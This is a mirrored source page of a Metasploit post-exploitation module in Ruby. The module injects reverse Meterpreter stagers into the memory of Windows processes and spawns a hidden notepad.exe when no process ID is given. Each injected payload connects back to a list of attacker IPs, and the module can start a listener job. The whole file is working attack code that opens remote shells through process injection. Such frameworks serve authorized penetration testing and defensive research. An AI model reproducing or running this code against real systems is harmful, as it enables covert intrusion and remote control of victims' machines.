Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/manage/multi_meterpreter_inject.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7


8
  def initialize(info = {})

9
    super(

10
      update_info(

11
        info,

12
        'Name' => 'Windows Manage Inject in Memory Multiple Payloads',

13
        'Description' => %q{

14
          This module will inject into several processes a given

15
          payload and connect to a given list of IP addresses.

16
          The module works with a given lists of IP addresses and

17
          process IDs if no PID is given it will start the given

18
          process in the advanced options and inject the selected

19
          payload into the memory of the created module.

20
        },

21
        'License' => MSF_LICENSE,

22
        'Author' => [

23
          'Carlos Perez <carlos_perez[at]darkoperator.com>',

24
          'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>' # added multiple payload support

25
        ],

26
        'Platform' => [ 'win' ],

27
        'SessionTypes' => ['meterpreter'],

28
        'Compat' => {

29
          'Meterpreter' => {

30
            'Commands' => %w[

31
              stdapi_sys_process_attach

32
              stdapi_sys_process_execute

33
              stdapi_sys_process_memory_allocate

34
              stdapi_sys_process_memory_write

35
              stdapi_sys_process_thread_create

36
            ]

37
          }

38
        },

39
        'Notes' => {

40
          'Stability' => [CRASH_SERVICE_DOWN],

41
          'SideEffects' => [],

42
          'Reliability' => []

43
        }

44
      )

45
    )

46


47
    register_options(

48
      [

49
        OptString.new('PAYLOAD', [false, 'Payload to inject in to process memory', 'windows/meterpreter/reverse_tcp']),

50
        OptInt.new('LPORT', [false, 'Port number for the payload LPORT variable.', 4444]),

51
        OptString.new('IPLIST', [true, 'List of semicolon separated IP list.', Rex::Socket.source_address('1.2.3.4')]),

52
        OptString.new('PIDLIST', [false, 'List of semicolon separated PID list.', '']),

53
        OptBool.new('HANDLER', [false, 'Start new exploit/multi/handler job on local box.', false]),

54
        OptInt.new('AMOUNT', [false, 'Select the amount of shells you want to spawn.', 1])

55
      ]

56
    )

57


58
    register_advanced_options(

59
      [

60
        OptString.new('PROCESSNAME', [false, 'Description', 'notepad.exe'])

61
      ]

62
    )

63
  end

64


65
  def run

66
    unless session.platform == 'windows' && [ARCH_X64, ARCH_X86].include?(session.arch)

67
      print_error('This module requires native Windows meterpreter functions not compatible with the selected session')

68
      return

69
    end

70


71
    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']

72
    print_status("Running module against #{hostname} (#{session.session_host})")

73


74
    # Set variables

75
    multi_ip = nil

76
    multi_pid = nil

77


78
    if datastore['HANDLER']

79
      create_multi_handler(datastore['PAYLOAD'], datastore['LPORT'])

80
    end

81


82
    multi_ip = datastore['IPLIST'].split(';')

83
    multi_pid = datastore['PIDLIST'].split(';')

84


85
    datastore['AMOUNT'].times do # iterate through number of shells

86
      multi_ip.zip(multi_pid).each do |a|

87
        # Check if we have an IP for the session

88
        payload = create_payload(datastore['PAYLOAD'], a[0], datastore['LPORT'])

89
        if a[1]

90
          inject(a[1], payload)

91
        else

92
          # if no PID we create a process to host the Meterpreter session

93
          pid_num = start_proc(datastore['PROCESSNAME'])

94
          inject(pid_num, payload)

95
        end

96
        select(nil, nil, nil, 5)

97
      end

98
    end

99
  end

100


101
  # Function for injecting payload in to a given PID

102
  #-------------------------------------------------------------------------------

103
  def inject(target_pid, payload_to_inject)

104
    print_status("Injecting meterpreter into process ID #{target_pid}")

105


106
    host_process = session.sys.process.open(target_pid.to_i, PROCESS_ALL_ACCESS)

107
    raw = payload_to_inject.generate

108
    mem = host_process.memory.allocate(raw.length + (raw.length % 1024))

109


110
    print_status("Allocated memory at address #{'0x%.8x' % mem}, for #{raw.length} byte stager")

111
    print_status('Writing the stager into memory...')

112
    host_process.memory.write(mem, raw)

113
    host_process.thread.create(mem, 0)

114
    print_good("Successfully injected Meterpreter into process: #{target_pid}")

115
  rescue StandardError => e

116
    print_error("Failed to inject payload into #{target_pid}!")

117
    print_error(e.message)

118
  end

119


120
  # Function for Creation of Connection Handler

121
  #-------------------------------------------------------------------------------

122
  def create_multi_handler(payload_to_inject, rport, rhost = '0.0.0.0')

123
    print_status("Starting connection handler at port #{rport} for #{payload_to_inject}")

124
    mul = client.framework.exploits.create('multi/handler')

125
    mul.datastore['WORKSPACE'] = session.workspace

126
    mul.datastore['PAYLOAD'] = payload_to_inject

127
    mul.datastore['LHOST'] = rhost

128
    mul.datastore['LPORT'] = rport

129
    mul.datastore['EXITFUNC'] = 'process'

130
    mul.datastore['ExitOnSession'] = false

131


132
    mul.exploit_simple(

133
      'Payload' => mul.datastore['PAYLOAD'],

134
      'RunAsJob' => true

135
    )

136
    print_good('exploit/multi/handler started!')

137
  end

138


139
  # Function for Creating the Payload

140
  #-------------------------------------------------------------------------------

141
  def create_payload(payload_type, lhost, lport)

142
    print_status("Creating a reverse meterpreter stager: LHOST=#{lhost} LPORT=#{lport}")

143
    payload = payload_type

144
    pay = client.framework.payloads.create(payload)

145
    pay.datastore['LHOST'] = lhost

146
    pay.datastore['LPORT'] = lport

147
    return pay

148
  end

149


150
  # Function starting notepad.exe process

151
  #-------------------------------------------------------------------------------

152
  def start_proc(proc_name)

153
    print_good('Starting Notepad.exe to house Meterpreter Session.')

154
    proc = client.sys.process.execute(proc_name, nil, { 'Hidden' => true })

155
    print_good("Process created with pid #{proc.pid}")

156
    return proc.pid

157
  end

158
end

159


160